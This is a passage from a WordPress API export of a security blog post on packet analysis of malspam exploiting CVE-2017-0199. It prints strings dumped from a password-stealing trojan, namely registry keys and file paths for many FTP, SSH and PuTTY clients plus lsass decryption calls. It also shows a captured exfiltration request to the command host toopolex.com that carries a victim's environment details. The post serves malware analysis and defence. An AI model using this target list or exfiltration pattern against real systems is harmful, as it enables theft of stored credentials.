Software\\Fling\\Accounts\r\n%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF\r\n%s\\FTPBox\\profiles.conf\r\n%s\\FTPGetter\\Profile\\servers.xml\r\n%s\\FTPGetter\\servers.xml\r\n%s\\FTPInfo\\ServerList.xml\r\n%s\\FTPInfo\\ServerList.cfg\r\n%s\\FTP Navigator\\Ftplist.txt\r\n%s\\FTP Now\\sites.xml\r\n%s\\FTPShell\\ftpshell.fsi\r\n%s\\.config\\fullsync\\profiles.xml\r\n%s\\DeluxeFTP\\sites.xml\r\n%s\\GoFTP\\settings\\Connections.txt\r\nJaSFtp\r\nAbleFTP\r\nAutomize\r\n%s\\%s%i\\encPwd.jsd\r\n%s\\%s%i\\data\\settings\\sshProfiles-j.jsd\r\n%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd\r\nPass\r\nHost\r\nPort\r\nSoftware\\LinasFTP\\Site Manager\r\n%s\\oZone3D\\MyFTP\\myftp.ini\r\n%s\\NetDrive\\NDSites.ini\r\n%s\\NetDrive2\\drives.dat\r\n%s\\Fastream NETFile\\My FTP Links\r\n%s\\NexusFile\\userdata\\ftpsite.ini\r\n%s\\NexusFile\\ftpsite.ini\r\n%s\\INSoftware\\NovaFTP\\NovaFTP.db\r\n%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml\r\n%s\\Odin Secure FTP Expert\\QFDefault.QFQ\r\n%s\\Odin Secure FTP Expert\\SiteInfo.QFP\r\nPublicKeyFile\r\nTerminalType\r\nPortNumber\r\nSoftware\\9bis.com\\KiTTY\\Sessions\r\nSoftware\\SimonTatham\\PuTTY\\Sessions\r\n_dec\r\n%s_dec\r\nlsasrv.dll\r\nLsaICryptUnprotectData\r\nlsass.exe\r\n%s\\Microsoft\\Credentials\r\nConfig Path\r\nSoftware\\VanDyke\\SecureFX\r\n%s\\Sessions\r\n*.ini\r\nPort\r\nUserName\r\nPassword\r\n%s\\SftpNetDrive\r\n*.cfg\r\n%s\\Sherrod Computers\\sherrod FTP\\favorites\r\n#document.favoriteManager*\r\n%s\\SmartFTP\r\n{*.xml\r\n%s\\Staff-FTP\\sites.ini\r\n%s\\Steed\\bookmarks.txt\r\n%s\\SuperPutty\r\nSessions*\r\nsftp:\/\/\r\nftp:\/\/\r\nftps:\/\/\r\nhttp:\/\/\r\nhttp:\/\/\r\n{.:CRED:.}\r\n{CREN}\r\n{CRDB}\r\nProfiles\r\n%s\\Syncovery\r\nSyncovery.ini\r\n%s\\wcx_ftp.ini\r\n%s\\GHISLER\\wcx_ftp.ini\r\nFtpIniName\r\nSoftware\\Ghisler\\Total Commander\r\n%s\\UltraFXP\\sites.xml\r\n%s\\WinFtp Client\\Favorites.dat\r\nFSProtocol\r\nSoftware\\Martin Prikryl\r\n%s\\WS_FTP\\WS_FTP.INI\r\n%s\\WS_FTP.INI\r\n%s\\Ipswitch\r\nws_ftp.ini\r\n%s\\NetSarang\\Xftp\\Sessions\r\n*xfp\r\nMAC=%02X%02X%02XINSTALL=%08X%08Xk\r\n1?0`\r\n%s\\%s\\%s.exe\r\n\r\n-----\r\n\r\nUser-Agent: Mozilla\/4.08 (Charon; Inferno)\r\nHost: toopolex.com\r\nAccept: *\/*\r\nContent-Type: application\/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: BD5C680A\r\nContent-Length: 147\r\nConnection: close\r\n\r\n\r\nUc28-881c-1b596423337d\r\nBill\r\n6] <\r\n=::=::\\\r\nALLUSERSPROFILE=C:\\ProgramData\r\nAPPDATA=C:\\Users\\Bill\\AppData\\Roaming\r\nCommonProgramFiles=C:\\Program Files (x86)\\Common Files\r\nCommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files\r\nCommonProgramW6432=C:\\Program Files\\Common Files\r\nCOMPUTERNAME=BILL-PC\r\nComSpec=C:\\Windows\\system32\\cmd.exe\r\nFP_NO_HOST_CHECK=NO\r\nHOMEDRIVE=C:\r\nHOMEPATH=\\Users\\Bill\r\nLOCALAPPDATA=C:\\Users\\Bill\\AppData\\Local\r\nLOGONSERVER=\\\\BILL-PC\r\nNUMBER_OF_PROCESSORS=2\r\nOS=Windows_NT\r\nPath=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\r\nPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC\r\nPROCESSOR_ARCHITECTURE=x86\r\nPROCESSOR_ARCHITEW6432=AMD64\r\nPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel\r\nPROCESSOR_LEVEL=6\r\nPROCESSOR_REVISION=3d04\r\nProgramData=C:\\ProgramData\r\nProgramFiles=C:\\Program Files (x86)\r\nProgramFiles(x86)=C:\\Program Files (x86)\r\nProgramW6432=C:\\Program Files\r\nPSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\\r\nPUBLIC=C:\\Users\\Public\r\nSESSIONNAME=Console\r\nSystemDrive=C:\r\nSystemRoot=C:\\Windows\r\nTEMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nTMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nUSERDOMAIN=Bill-PC\r\nUSERNAME=Bill\r\nUSERPROFILE=C:\\Users\\Bill\r\nwindir=C:\\Windows\r\nwindows_tracing_flags=3\r\nwindows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log\r\nVTBin\\Tests\\installpackage\\csilogfile.log\r\n 200 OK\r\nDate: Mon, 26 Jun 2017 07:39:45 GMT\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text\/html; charset=UTF-8<\/pre>\n","protected":false},"excerpt":{"rendered":"
Looking for some malspam yesterday and I came across something that looks like it was exploiting the CVE 2017-0199 vulnerability in MS Office RTF files. FireEye did a nice write-up of this which you can read here. Googling to see if anyone else had seen these domains before, I was able to find that @Security Doggo had a sample back on the 14th of June for the dev[.]null[.]vg domain and that Sophos has written about the domain toopolex[.]com domain in their “Troj\/Fareit-DEB” report. Running the PCAP through Network Total’s tool, I saw that it is labeling this infection as part…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-879","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/879","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=879"}],"version-history":[{"count":9,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/879\/revisions"}],"predecessor-version":[{"id":901,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/879\/revisions\/901"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=879"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=879"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=879"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}